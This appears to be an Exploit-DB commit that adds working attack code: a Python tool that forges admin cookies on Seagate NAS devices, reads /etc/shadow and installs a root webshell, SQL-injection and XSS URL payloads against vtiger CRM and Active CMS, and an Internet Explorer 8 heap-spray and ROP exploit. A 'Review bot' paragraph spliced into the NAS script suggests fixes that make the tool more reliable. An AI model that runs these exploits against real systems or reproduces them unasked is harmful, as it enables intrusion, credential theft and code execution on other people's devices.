Update: 2015-03-02

4 new exploits
Offensive Security 2015-03-02 08:35:29 +00:00
parent d8b2f45cd4
commit 0853b7e8a4
5 changed files with 641 additions and 0 deletions


@ -32631,7 +32631,11 @@ id,file,description,date,author,platform,type,port
36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection Vulnerability",2011-10-02,anonymous,linux,remote,0
36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 'referer' Header SQL Injection Vulnerability",2011-10-03,"Patroklos Argyroudis",php,webapps,0
36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0
36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)",2015-03-01,"OJ Reeves",hardware,webapps,80
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0



@ -0,0 +1,330 @@
#!/usr/bin/env python
#
# Seagape
# =======
# Seagate Business NAS pre-authentication remote code execution
# exploit as root user.
#
# by OJ Reeves (@TheColonial) - for full details please see
# https://beyondbinary.io/advisory/seagate-nas-rce/
#
# Usage
# =====
# seagape.py <ip> <port> [-c [ua]]
#
# - ip : ip or host name of the target NAS
# - port : port of the admin web ui
# - -c : (optional) create a cookie which will give admin access.
# Not specifying this flag results in webshell installation.
# - ua : (optional) the user agent used by the browser for the
# admin session (UA must match the target browser).
# Default value is listed below
#
# Example
# =======
# Install and interact with the web shell:
# seagape.py 192.168.0.1 80
#
# Create admin cookie
# seagape.py 192.168.0.1 80 -c
import base64
import hashlib
import itertools
import os
import re
import socket
import sys
import urllib
import urllib2
import uuid
import xml.sax.saxutils
if len(sys.argv) < 3:
print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0])
sys.exit(1)
# Every Seagate nas has the same XOR key. Great.
XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07'
# This is the User agent we'll use for most of the requests
DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'
# This is the description we're going to be reading from
LFI_FILE = '/etc/devicedesc'
# the base globals that will hold our state
host = sys.argv[1]
port = int(sys.argv[2])
cis = ''
hostname = ''
webshell = str(uuid.uuid1()) + ".php"
def chunks(s, n):
for i in xrange(0, len(s), n):
yield s[i:i + n]
def forward_interleave(a, b):
return ''.join(itertools.chain(*zip(itertools.cycle(a), b)))
def xor(s, k):
return ''.join(chr(ord(a) ^ ord(b)) for a, b in itertools.izip(s, itertools.cycle(k)))
def sha1(s):
return hashlib.sha1(s).hexdigest()
def decode(s):
f = xor(s, XOR_KEY)
return ''.join(chr(ord(a) ^ ord(b)) for a, b in chunks(f, 2))
def encode(s):
s = forward_interleave(sha1(s), s)
s = ''.join(a + chr(ord(a) ^ ord(b)) for a, b in chunks(s, 2))
return xor(s, XOR_KEY)
def make_request(uri = "/", ci_session = None, headers = None, post_data = None):
method = 'GET'
if not headers:
headers = {}
headers['Host'] = host
if 'User-Agent' not in headers:
headers['User-Agent'] = DEFAULT_UA
if 'Accept' not in headers:
headers['Accept'] = 'text/html'
if post_data:
method = 'POST'
post_data = urllib.urlencode(post_data)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
if ci_session:
ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
headers['Cookie'] = 'ci_session={0}'.format(ci_session)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
http = ""
http += "{0} {1} HTTP/1.1\r\n".format(method, uri)
for h in headers:
http += "{0}: {1}\r\n".format(h, headers[h])
if post_data:
http += "Content-Length: {0}\r\n".format(len(post_data))
http += "\r\n"
if post_data:
http += post_data
s.send(http)
result = ""
while True:
data = s.recv(1024)
if not data:
break
result += data
s.close()
return result
def get_ci_session():
resp = make_request()
for l in resp.split("\r\n"):
m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l)
for name, value in m:
if name == 'ci_session' and len(value) > 40:
return decode(base64.b64decode(urllib.unquote(value)))
print "Unable to establish session with {0}".format(host)
sys.exit(1)
def add_string(ci_session, key, value):
prefix = 's:{0}:"{1}";s:'.format(len(key), key)
if prefix in ci_session:
ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session)
else:
# doesn't exist, so we need to add it to the start and the end.
count = int(ci_session.split(':')[1]) + 1
ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session)
return ci_session
def set_admin(ci_session):
return add_string(ci_session, "is_admin", "yes")
def set_language(ci_session, lang):
return add_string(ci_session, "language", lang)
def include_file(ci_session, file_path):
if file_path[0] == '/':
file_path = '../../../../../..' + file_path
return set_language(ci_session, file_path + "\x00")
def read_file(file_path, post_data = None):
resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data)
return resp
def hashdump():
shadow = read_file('/etc/shadow')
for l in shadow.split("\n"):
if l and ':!:' not in l and ':x:' not in l:
parts = l.split(':')
print "{0}:{1}".format(parts[0], parts[1])
def cmd(command):
headers = {
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept' : '*/*',
'User-Agent' : DEFAULT_UA
}
post_data = urllib.urlencode({'c' : command})
headers['Content-Type'] = 'application/x-www-form-urlencoded'
ci_session = urllib.quote(base64.b64encode(encode(cis)))
headers['Cookie'] = 'ci_session={0}'.format(ci_session)
url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
req = urllib2.Request(url, headers = headers, data = post_data)
return urllib2.urlopen(req).read()
def shell():
running = True
while running:
c = raw_input("Shell ({0}) $ ".format(post_id))
if c != 'quit' and c != 'exit':
cmd(c)
else:
running = False
def show_admin_cookie(user_agent):
ci_session = add_string(cis, 'is_admin', 'yes')
ci_session = add_string(ci_session, 'username', 'admin')
ci_session = add_string(ci_session, 'user_agent', user_agent)
ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
print "Session cookies are bound to the browser's user agent."
print "Using user agent: " + user_agent
print "ci_session=" + ci_session
def show_version():
print "Firmware Version: {0}".format(get_firmware_version())
def show_cookie():
print cis
def show_help():
print ""
print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"
print " - https://beyondbinary.io/bbsec/001"
print "==========================================================================="
print "version - Print the current firmware version to screen."
print "dumpcookie - Print the current cookie to screen."
print "admincookie <ua> - Create an admin login cookie (ua == user agent string)."
print " Add to your browser and access ANY NAS box as admin."
print "help - Show this help."
print "exit / quit - Run for the hills."
print "<anything else> - Execute the command on the server."
print ""
def execute(user_input):
result = True
parts = user_input.split(' ')
c = parts[0]
if c == 'admincookie':
ua = DEFAULT_UA
if len(parts) > 1:
ua = ' '.join(parts[1:])
show_admin_cookie(ua)
elif c == 'dumpcookie':
show_cookie()
elif c == 'version':
show_version()
elif c == 'help':
show_help()
elif c == 'quit' or c == 'exit':
remove_shell()
result = False
else:
print cmd(user_input)
return result
def get_firmware_version():
resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043",
ci_session = acis)
return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2]
def install_shell():
resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043",
ci_session = acis)
existing_setup = ''
for l in resp.split("\r\n"):
if 'general_setup' in l:
existing_setup = l
break
# generate the shell and its installer
exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>")
installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post)
write_php = xml.sax.saxutils.quoteattr(installer)[1:-1]
start = existing_setup.index('" description="') + 15
end = existing_setup.index('"', start)
updated_setup = existing_setup[0:start] + write_php + existing_setup[end:]
# write the shell to the description
resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",
ci_session = acis,
headers = { },
post_data = { 'general_setup' : updated_setup })
# invoke the installer
read_file(LFI_FILE)
# remove the installer
resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",
ci_session = acis,
headers = { },
post_data = { 'general_setup' : existing_setup })
def remove_shell():
return cmd('rm -f {0}'.format(webshell))
print "Establishing session with {0} ...".format(host)
cis = get_ci_session()
if len(sys.argv) >= 4 and sys.argv[3] == '-c':
ua = DEFAULT_UA
if len(sys.argv) > 4:
ua = sys.argv[4]
show_admin_cookie(ua)
else:
print "Configuring administrative access ..."
acis = add_string(cis, 'is_admin', 'yes')
acis = add_string(acis, 'username', 'admin')
print "Installing web shell (takes a while) ..."
install_shell()
print "Extracting id and hostname ..."
identity = cmd('whoami').strip()
hostname = cmd('cat /etc/hostname').strip()
show_help()
running = True
while running:
try:
user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname))
running = execute(user_input)
except:
print "Something went wrong. Try again."
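Review bot: The catch-all `except:` in the interactive loop at the end of the file (the `while running:` block after `show_help()`) also swallows `KeyboardInterrupt` and `SystemExit`, so Ctrl-C at the prompt only prints "Something went wrong. Try again." and the loop can only be left through `quit`/`exit`; `except Exception:` is the narrowest catch that keeps the current handling of runtime errors. Separately, `shell()` and `hashdump()` are never called anywhere in the file, and `shell()` formats its prompt with an undefined name `post_id`, so it would raise `NameError` if it were ever wired up; both are dead code and should be dropped rather than left in. As rendered, the listing has lost its indentation and blank lines (the hunk header claims 330 lines while fewer are shown), so line positions above refer to the page, not the literal file.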

15
platforms/php/webapps/36208.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/49948/info
vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50001/info
Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Active CMS 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/activecms/admin/admin?action=module&mod=&#039;<script>alert(document.cookie)</script>


@ -0,0 +1,283 @@
source: http://www.securityfocus.com/bid/49964/info
Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.
Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions.
<html>
<head>
</head>
<body>
<script type="text/javascript">
<!--
//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";
var newstack,newstackaddr;
var fakeobj;
var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();
var optarray;
var mshtmlbase;
//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
function inttostr(num) {
return String.fromCharCode(num%65536,Math.floor(num/65536));
}
function crash() {
var o = new Option();
selarray[99].options.add(o,-0x20000000);
}
function readmem(addr) {
if(addr < readaddr) alert("Error, can't read that address");
return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
}
function readmem2(addr,size) {
if(addr < readaddr) alert("Error, can't read that address");
return spray[readindex].substr((addr-readaddr)/2,size/2);
}
function overwrite(addr) {
try {
var index = (addr-optarryaddr)/4 - 0x40000000;
selarray[99].options.add(optarray.pop(),index);
} catch(err) {}
}
function getreadaddr() {
readaddr = 0;
var indexarray = new Array();
var tmpaddr = 0;
var i,index;
index = readmem(tmpaddr);
indexarray.push(index);
while(1) {
tmpaddr += 0x100000;
index = readmem(tmpaddr);
for(i=0;i<indexarray.length;i++) {
if(indexarray[i]==index+1) {
readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
return 1;
} else if(indexarray[i]==index-1) {
readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
return 1;
}
}
indexarray.push(index);
}
}
//leverages the vulnerability into memory disclosure
function initread() {
//overwrite something in a heap spray slide
try {
selarray[99].options.add(optarray.pop(),-100000000/4);
} catch(err) {}
//now find what and where exectly did we overwrite
readindex = -1;
var i;
for(i=1;i<200;i++) {
if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
{
readindex = i;
break;
}
}
if(readindex == -1) {
alert("Error overwriring first spray");
return 0;
}
var start=2,len=spray[readindex].length-2,mid;
while(len>10) {
mid = Math.round(len/2);
mid = mid - mid%2;
if(spray[readindex].substr(start,mid) !=
spray[readindex-1].substr(start,mid)) {
len = mid;
} else {
start = start+mid;
len = len-mid;
//if(spray[readindex].substr(start,mid) ==
spray[readindex-1].substr(start,mid)) alert("error");
}
}
for(i=start;i<(start+20);i=i+2) {
if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
break;
}
}
//overwrite the string length
try {
selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
} catch(err) {}
if(spray[readindex].length == spray[readindex-1].length) alert("error
overwriting string length");
//readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
getreadaddr();
optarryaddr = readaddr + 100000000 + i*2;
return 1;
}
function trysploit() {
//create some helper objects
for(var i =0; i < 100; i++) {
elms.push(document.createElement('div'));
}
//force the option cache to rebuild itself
var tmp1 = selarray[99].options[70].text;
//overwrite the CTreeNode pointer
overwrite(corruptaddr);
//read the address of the option object we overwrited with
var optadr = readmem(corruptaddr);
//delete the option object...
selarray[99].options.remove(0);
CollectGarbage();
//...and allocate some strings in its place
for(var i = 0; i < elms.length; i++) {
elms[i].className = fakeobj;
}
//verify we overwrote the deleted option object successfully
if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;
alert("success, calc.exe should start once you close this message box");
//now do something with the corrupted option object
corruptedoption.parentNode.click();
}
function hs() {
//first heap spray, nop slide + shellcode
spray = new Array(200);
var pattern = unescape("%u0C0C%u0C0C");
while(pattern.length<(0x100000/2)) pattern+=pattern;
pattern = pattern.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray[i] = [inttostr(i)+pattern+scode].join("");
}
//fill small gaps, we wan everything _behind_ our heap spray so that
we can read it
var asmall = new Array(10000);
pattern = "aaaa";
while(pattern.length<500) pattern+=pattern;
for(var i=0;i<10000;i++) {
asmall[i]=[pattern+pattern].join("");
}
//create some select and option elements
selarray = new Array(100);
for(var i=0;i<100;i++) {
selarray[i] = document.createElement("select");
for(var j=0;j<100;j++) {
var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
selarray[i].options.add(o,0);
}
}
//create some extra option elements
optarray = new Array(10000);
for(var i=0;i<10000;i++) {
optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
}
//enable memory disclosure
if(initread()==0) return;
//force the option cache to rebuild itself
var tmp1 = selarray[99].options[60].text;
//get the address of some option element to be corrupted, also remove
it from its select element, we don't want anything else messing with
it
corruptedoptionaddr = readmem(optarryaddr+60*4);
corruptedoption = selarray[99].options[60];
selarray[99].options.remove(60);
//get the base address of mshtml.dll based on the vtable address
inside the option object
mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
alert("base address of mshtml.dll : " + mshtmlbase.toString(16));
//we'll overwrite the pointer to the CTreeNode object, compute its address
corruptaddr = corruptedoptionaddr+0x14;
//second heap-spray, this one will act as a stack (we'll exchange
stack pointer with a pointer into this)
spray2 = new Array(200);
//some address that is likely to be inside the "stack"
newstackaddr = optarryaddr+100000000;
newstackaddr-=newstackaddr%0x1000;
newstackaddr+=0x24;
//assemble the "stack" so that it calls VirtualProtect on the firs
shellcode and then jumps into it through return-oriented-programming
newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
while(newstack.length<(0x1000/2))
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
newstack = newstack.substr(0,0x1000/2);
while(newstack.length<(0x100000/2)) newstack+=newstack;
newstack = newstack.substr(0,0x100000/2-0x100);
for(var i=0;i<200;i++) {
spray2[i] = [newstack].join("");
}
//constract a fake object which will replace a deleted option object
(it has to be the same size)
//fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
//loop until we either achieve command execution or fail
for(var i=0;i<100;i++) {
trysploit();
}
alert("Exploit failed, try again");
}
hs();
-->
</script>
</body>
</html>